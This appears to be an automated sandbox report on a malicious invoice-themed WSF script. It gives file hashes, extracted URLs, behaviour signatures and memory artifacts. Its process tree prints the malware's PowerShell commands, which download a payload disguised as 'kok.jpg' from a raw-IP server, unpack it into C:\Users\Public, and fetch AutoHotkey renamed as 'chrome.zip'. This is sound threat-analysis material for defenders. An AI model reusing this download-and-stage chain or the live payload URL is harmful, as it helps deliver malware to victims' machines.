Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
05-06-2024 11:54
General
-
Target
Invoice#1136309464.wsf
-
Size
107KB
-
MD5
ab87b1030210083dfb5b1e4f11647846
-
SHA1
c53b4eaece77ca95b11b0facb82fc81af7e6735b
-
SHA256
5569aaf9f9d3e53647419506c0cb256ac27d7538d2544a7031c2d7d31df0cb58
-
SHA512
2980941237f69d4ebf380af918144f7a9acef04d7ca195f2e1531e1de6ea2ded17ce0115fd66db5fc7d526397634d22ec80ee33d987f25ca369de0558d672735
-
SSDEEP
384:qR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6wR6cR6cR6cR6cR6cR6cR6cR6cR6N:14JElDTR
Malware Config
Extracted
http://162.244.210.92:333/kok.jpg
Extracted
https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#1136309464.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://162.244.210.92:333/kok.jpg' -Destination 'C:\Users\Public\bbbb.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD506ae91c1cb7f3b9b7179bd2da7f90a19
SHA1365b9188b90d43e08bfd80c04753189d63582729
SHA256385c6fd400d581499bd3ce433860163730aff6bf2d8d8aeea8fa152848859d96
SHA512ecaa800f78bdcaa7808be2822b800cec18e761ef669c222007c72bdd8097659885cfdc03284fef3dd3e402d9f950d622146b49adb232ab25a7b65ecabf91d6bf
-
memory/2772-20-0x000000001B710000-0x000000001B9F2000-memory.dmpFilesize
2.9MB
-
memory/2772-21-0x00000000027F0000-0x00000000027F8000-memory.dmpFilesize
32KB
-
memory/3000-7-0x000007FEF5E2E000-0x000007FEF5E2F000-memory.dmpFilesize
4KB
-
memory/3000-8-0x000000001B4C0000-0x000000001B7A2000-memory.dmpFilesize
2.9MB
-
memory/3000-9-0x00000000029F0000-0x00000000029F8000-memory.dmpFilesize
32KB
-
memory/3000-10-0x000007FEF5B70000-0x000007FEF650D000-memory.dmpFilesize
9.6MB
-
memory/3000-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmpFilesize
9.6MB
-
memory/3000-13-0x000007FEF5B70000-0x000007FEF650D000-memory.dmpFilesize
9.6MB
-
memory/3000-11-0x000007FEF5B70000-0x000007FEF650D000-memory.dmpFilesize
9.6MB
-
memory/3000-14-0x000007FEF5B70000-0x000007FEF650D000-memory.dmpFilesize
9.6MB